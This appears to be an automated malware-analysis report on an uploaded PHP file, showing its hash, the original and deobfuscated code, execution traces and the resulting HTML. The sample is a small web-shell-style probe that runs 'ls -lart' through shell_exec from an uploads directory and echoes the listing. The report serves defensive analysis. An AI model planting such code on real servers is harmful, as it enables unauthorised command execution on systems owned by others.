PHP Malware Analysis

0AB0.php

md5: c5111daca7d79b68b0764477925f78d7

Attributes

Execution


Deobfuscated PHP code

<?php

$output = shell_exec('ls -lart');
echo "<pre>{$output}</pre>";

Execution traces

data/traces/c5111daca7d79b68b0764477925f78d7_trace-1676260161.5116.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:49:47.409451]
1	0	1	0.000133	393512
1	3	0	0.000181	393632	{main}	1		/var/www/html/uploads/0AB0.php	0	0
2	4	0	0.000198	393632	shell_exec	0		/var/www/html/uploads/0AB0.php	2	1	'ls -lart'
2	4	1	0.001733	394048
2	4	R			'total 24\ndrwxrwxrwx 3 root    root    4096 Feb 12 22:49 ..\n-rw-r--r-- 1 root    root      64 Feb 12 22:49 .htaccess\n-rwxr-xr-x 1 root    root      57 Feb 12 22:49 prepend.php\n-rw-rw-r-- 1 osboxes osboxes   72 Feb 12 22:49 0AB0.php\ndrwxrwxrwx 3 root    root    4096 Feb 12 22:49 .\ndrwxrwxrwx 2 root    root    4096 Feb 12 22:49 data\n'
1		A						/var/www/html/uploads/0AB0.php	2	$output = 'total 24\ndrwxrwxrwx 3 root    root    4096 Feb 12 22:49 ..\n-rw-r--r-- 1 root    root      64 Feb 12 22:49 .htaccess\n-rwxr-xr-x 1 root    root      57 Feb 12 22:49 prepend.php\n-rw-rw-r-- 1 osboxes osboxes   72 Feb 12 22:49 0AB0.php\ndrwxrwxrwx 3 root    root    4096 Feb 12 22:49 .\ndrwxrwxrwx 2 root    root    4096 Feb 12 22:49 data\n'
1	3	1	0.001793	394016
			0.001821	314640
TRACE END   [2023-02-13 01:49:47.411166]


Generated HTML code

<html><head></head><body><pre>total 12
drwxrwxrwx 3 root    root    4096 Feb 12 22:49 ..
-rw-r--r-- 1 root    root       0 Feb 12 22:49 beneri.se_malware_analysis
-rw-rw-r-- 1 osboxes osboxes   72 Feb 12 22:49 0AB0.php
drwxrwxrwx 2 root    root    4096 Feb 12 22:49 .
</pre></body></html>

Original PHP code

<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
?>